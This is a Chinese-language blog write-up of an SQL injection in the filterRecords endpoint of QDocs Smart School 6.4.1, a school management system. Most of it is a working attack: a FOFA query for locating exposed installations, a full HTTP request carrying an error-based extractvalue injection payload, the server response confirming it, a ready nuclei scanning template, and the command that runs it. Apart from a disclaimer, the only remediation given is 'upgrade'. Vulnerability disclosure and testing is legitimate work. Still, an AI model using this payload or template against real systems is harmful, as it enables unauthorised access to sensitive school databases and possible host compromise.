_副本-eccv.png)
QDocs Smart School SQL注入漏洞
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
漏洞名称
QDocs Smart School SQL注入漏洞
漏洞影响
Smart School 6.4.1
漏洞描述
QDocs Smart School是一套智慧校园管理系统。Smart School 6.4.1系统filterRecords接口存在sql注入漏洞,攻击者可获取数据库敏感数据,甚至执行命令,进而有可能导致主机被远控。
FOFA搜索语句
body="close closebtnmodal"_副本-insk.png)
漏洞复现
poc如下,计算123456的MD5值
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1响应数据包如下
HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 14 Nov 2023 02:21:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: ci_session=0fbd043af961fa6feb7ba1a8b5c5a3b2c0cff392; expires=Tue, 14-Nov-2023 04:21:35 GMT; Max-Age=7200; path=/; HttpOnly
Upgrade: h2,h2c
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Database Error</title>
<style type="text/css">
::selection { background-color: #E13300; color: white; }
::-moz-selection { background-color: #E13300; color: white; }
body {
background-color: #fff;
margin: 40px;
font: 13px/20px normal Helvetica, Arial, sans-serif;
color: #4F5155;
}
a {
color: #003399;
background-color: transparent;
font-weight: normal;
}
h1 {
color: #444;
background-color: transparent;
border-bottom: 1px solid #D0D0D0;
font-size: 19px;
font-weight: normal;
margin: 0 0 14px 0;
padding: 14px 15px 10px 15px;
}
code {
font-family: Consolas, Monaco, Courier New, Courier, monospace;
font-size: 12px;
background-color: #f9f9f9;
border: 1px solid #D0D0D0;
color: #002166;
display: block;
margin: 14px 0 14px 0;
padding: 12px 10px 12px 10px;
}
#container {
margin: 10px;
border: 1px solid #D0D0D0;
box-shadow: 0 0 8px #D0D0D0;
}
p {
margin: 12px 15px 12px 15px;
}
</style>
</head>
<body>
<div id="container">
<h1>A Database Error Occurred</h1>
<p>Error Number: 1105</p><p>XPATH syntax error: '^e10adc3949ba59abbe56e057f20f883'</p><p>SELECT `online_courses`.*, `course_category`.`category_name`
FROM `online_courses`
LEFT JOIN `course_category` ON `course_category`.`id` = `online_courses`.`category_id`
WHERE 1 = 1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))# '1'
AND `online_courses`.`front_side_visibility` = 'yes'
AND `online_courses`.`status` = 1</p><p>Filename: models/Course_model.php</p><p>Line Number: 708</p> </div>
</body>
</html>证明存在漏洞
nuclei poc
poc文件内容如下
id: smart-school-filterRecords-sqli
info:
name: QDocs Smart School SQL注入漏洞
author: fgz
severity: high
description: 'QDocs Smart School是一套智慧校园管理系统。Smart School 6.4.1系统filterRecords接口存在sql注入漏洞,攻击者可获取数据库敏感数据,甚至执行命令,进而有可能导致主机被远控。'
tags: 2023,smart-school,sqli
metadata:
max-request: 3
fofa-query: body="close closebtnmodal"
verified: true
http:
- method: POST
path:
- "{{BaseURL}}/course/filterRecords/"
headers:
Content-Type: application/x-www-form-urlencoded
body: "searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1"
matchers:
- type: dsl
dsl:
- "status_code_1 == 500 && contains(body,'e10adc3949ba59abbe56e057f20f883')"运行POC
nuclei.exe -t mypoc/其他/smart-school-filterRecords-sqli.yaml -u http://192.168.86.128:8990_副本-rovq.png)
修复建议
升级到最新版本。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
